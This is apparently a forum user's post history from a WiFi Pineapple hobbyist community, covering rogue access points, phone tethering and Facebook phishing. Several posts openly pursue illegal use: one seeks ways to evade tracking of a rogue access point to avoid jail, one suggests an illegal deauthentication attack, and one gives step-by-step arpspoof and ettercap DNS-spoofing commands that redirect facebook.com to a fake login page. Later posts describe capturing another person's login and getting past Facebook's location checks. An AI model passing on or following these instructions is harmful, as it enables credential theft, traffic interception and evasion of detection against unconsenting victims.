Andrei0427

Posts posted by Andrei0427

  1. I was reading through one of Stack Exchange's child websites and searched 'wifi pineapple' for kicks to see what would come up. I came across this thread saying that the pineapple's radio transmissions could be easily tracked with some software or specialized hardware, as indicated in the thread.

    http://security.stackexchange.com/questions/10783/tracking-down-a-rogue-access-point

    This got me thinking about how to mitigate it, as if one was to get caught, he would face jail time (obviously), much like this scenario:

    http://nakedsecurity.sophos.com/2012/07/16/seattle-cybercrime-trio-sentenced-for-3m-hacking-spree-via-wifi-and-malware/

    Anyways, back to my point.. would it be possible to set up a daemon that runs on the pineapple which is simply a bash script randomizing 'iwconfig wlan0 txpower XX' variables and applying them to the interface? At first it seems like the way to go but I'm not too sure about having the pineapple's CPU and interface hard at work the whole time changing the transmit power.

    Any thoughts on this? I can imagine that this could be easily created as a plugin, or 'infusions' as we call them here :)

    Regards,

    Andrei

  2. I doubt any form of reaver-WPS is possible on the N900, although I have come across some Python scripts that came close, they just had some small issues that made it not work. I'm not sure if the author updated them. :P

    I'd link to the source but it has been a long time since I have seen them :/ Although a little googling should take you to them ;)

    Good luck!

    Andrei

  3. Thanks for the information! I do not have that much knowledge regarding the OpenWRT platform and how it works as regards treating USB devices.

    Just a question.. once you have the usb0 interface, did you give it an IP and default GW on both the phone and pineapple? And if so, are they pingable with each other?

    If you achieved this step I imagine a couple of iptables rules and it should work. Not forgetting ip_forwarding of course :)

    Thanks again, would really like to see this idea work as it would eliminate the laptop in its usage.

  4. I already posted a question but it seemed to be for a specific device, so I decided to collect what I think are a bunch of 'variables' that should help me to tether internet to the pineapple from my phone. Here we go :):

    1) Is it possible to change the default SSID from pineapple to something else upon start up?

    2) [!] Is it normal for the Karma log to list clients that have disconnected too? <Maybe it is not updating?>

    3) Is it possible to bring the USB0 interface up / configure it manually using ifconfig usb0 172.16.42.1? I.e. changing the default gateway IP from the PoE/LAN interface to the USB? If so, how is this achieved?

    4) Furthermore, considering I plan to use my phone as an internet provider, will the gateway be the pineapple, since it's providing the DHCP, or the phone, since it's providing internet?

    Having said that is sharing the SDCard on the phone to the pineapple?

    Sorry for all the questions but I have big plans for this if all of the above is possible.

    Regards,

    Andrei

  5. I've managed in the past to utilise the N900 in order to act as a USB wireless modem for my laptop when I'm in dire need of battery life. I was thinking and wondering if this is possible with the Pineapple? Having this convenience will greatly improve concealing the device as SSHing to the pineapple can easily be done, and providing internet makes it all the better!

    I have already attempted this but had no luck getting the usb0 interface up <I don't even know what it's called xD> Although my N900 has the capability to set a default GW, and its own IP address to the usb0 interface, in addition to echoing '1' to ip_forward. Has anyone managed or has the knowledge to accomplish this task?

    I know for certain that it's easier than having a 3G modem attached to it config. wise. All I need to know is how can I at least ping my phone through its 172.16.42.42 IP from the pineapple, although further guidance is appreciated :).

    Regards,

    Andrei

  6. Clients will need to be probing for a connection in order for karma to pick them up; if they're connected to a network already they won't be probing so it won't work.

    Try a deauthentication attack on one of them if you do not have physical access to them <Illegal> and see if it works.

  7. Note: Since I do not have my pineapple yet, I only can help so much as to webserver setup. You probably can use the steps from the RockRolling Pineapple episode to set up the redirection. This is what I did on a laptop running Backtrack:

    EDIT: Kinda looks shit on all browsers other than Chrome :/

    1) Place contents of: http://www.mediafire.com/?o1t637acat6a116 into /var/www/

    2) Append dns_spoof for ettercap with:

    facebook.com A webServIP

    3) Start up webserver: service apache2 start

    4) Run arpspoof <arpspoof -i wlan0 192.168.1.254(GW IP)>

    5) Run ettercap with:

    ettercap -Tqi wlan0 -P dns_spoof

    NB: The etter_dns file will need some searching to find, for some reason it changed when I upgraded distro but it's in

    /usr/local/share/ettercap/etter.dns

    I apologize once again for not being able to provide instructions for the pineapple, although once I learn how to do this on it I'll post the new instructions :)

  8. The only issue I could see would be any systems that cached the DNS for Facebook

    Most of the time yes, it would be cached but if the client has just connected to the network it would refresh the DNS server with your spoofed one. <I imagine you would have this pre-configured with the pineapple>

    Have you attempted that with a profile that uses the location aware feature (aka IP address block check for new locations)?

    EDIT:

    I noticed what you meant with the IP block, that account isn't mine but he logged in from a local network I was in so this didn't matter really :P

    Indeed I have and it still works! Facebook probably uses the geolocation of an IP rather than the block to track it, would be a pain to reset your password if you log in from a different ISP but within the same region.

    -------------------------------------------------------------------

    I'm thinking of adding that SSLSniff you mentioned to the login page to add more validity to it, although it's up to the victim to enable SSL on his profile. The only obvious giveaway is the ping.. I guess there's no way to escape it..

    Glad you found it useful :)

  9. I was playing around with a phishing script I had made some time ago with PHP and noticed that www.facebook.com AND facebook.com are treated differently with ettercap's DNS_SPOOF filter. So I set up the script to forward to www.facebook.com whilst having the DNS spoofed on facebook.com only. This will cause an automatic redirection to the user's real profile.

    This only works if the victim types "facebook.com" in the address bar, so the probability of this working is slightly slimmed down. Obviously this will only work if the user has 'remember me' ticked on the computer beforehand, which is mostly the case.

    Here's a vid. demo..

    I can post the source/method here upon request :)

  10. I'm wondering if it's possible to directly tether a phone to the pineapple. I managed with a laptop by just modifying the DNS servers and setting the default GW and a static IP for the machine.. the rest is set up on the phone.. has anyone managed to do this?

    I own an N900 by the way

  11. Have you tried the association plus setting a static channel using "-c 11"? If that still doesn't work I don't really know what to suggest.. maybe make sure no external tools are using the wlan interface because they may be causing the channel change
